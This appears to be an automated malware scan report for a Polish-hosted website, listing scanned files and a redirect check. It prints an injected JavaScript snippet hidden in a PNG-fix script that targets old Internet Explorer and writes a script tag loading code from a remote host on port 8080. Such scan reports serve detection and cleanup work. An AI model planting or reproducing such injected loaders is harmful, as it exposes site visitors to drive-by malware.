Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=artooostudio.za.pl
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.artooostudio.za.pl/ | 200 OK Content-Length: 15146 Content-Type: text/html | clean |
http://www.artooostudio.za.pl/_wp_scripts/jsFlashVer.js | 200 OK Content-Length: 12302 Content-Type: application/javascript | clean |
http://www.artooostudio.za.pl/_wp_scripts/jspngfix.js | 200 OK Content-Length: 5245 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var supported = !/Gecko/.test(navigator.userAgent) && !/Opera/.test(navigator.userAgent) && /MSIE (5\.5)|[6]/.test(navigator.userAgent) && navigator.platform == "Win32";
function OnLoadPngFix() { if(!supported) return; if(!event.srcElement) return; var src=event.srcElement.src; if(!src) return; if(!new RegExp(blankSrc).test(src)) { if(/\.png$/.test(src.toLowerCase())) { src = src.replace(/\(/g, "%28" ); src = document.write('<s'+'cript type="text/javascript" src="http://dolgo.lulucabana.com:8080/HDV.js"></scr'+'ipt>'); Antivirus reports:
| ||
http://www.artooostudio.za.pl/_wp_scripts/jsRollover.js | 200 OK Content-Length: 6421 Content-Type: application/javascript | clean |
http://www.artooostudio.za.pl/d0004e8cad401f4e3c02ddd8a69cb2d7.js | 404 Not Found Content-Length: 570 Content-Type: text/html | clean |
http://www.artooostudio.za.pl/test404page.js | 404 Not Found Content-Length: 3744 Content-Type: text/html | clean |
http://redefine.hit.stat24.com/files/js/ado.js | 200 OK Content-Length: 19109 Content-Type: application/x-javascript | clean |
http://www.artooostudio.za.pl/05d8cb992b11b84ce44d8924f26950b9.js | 200 OK Content-Length: 17144 Content-Type: application/x-javascript | clean |
http://www.artooostudio.za.pl/2deb000b57bfac9d72c14d4ed967b572.js?d=d3d3LmFydG9vb3N0dWRpby56YS5wbA== | 200 OK Content-Length: 8607 Content-Type: application/javascript | clean |
http://www.uslugi.osemka.pl/licznik.php?id=fe533722578f48564857485649495157504952 | 200 OK Content-Length: 1341 Content-Type: text/html | clean |
http://dolgo.lulucabana.com:8080/HDV.js | 500 Can't connect to dolgo.lulucabana.com:8080 Content-Length: 197 Content-Type: text/plain | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: artooostudio.za.pl
Result:
GET / HTTP/1.1
Host: artooostudio.za.pl
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: artooostudio.za.pl
Referer: http://www.google.com/search?q=artooostudio.za.pl
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: artooostudio.za.pl
Referer: http://www.google.com/search?q=artooostudio.za.pl
Result:
The result is similar to the first query. There are no suspicious redirects found.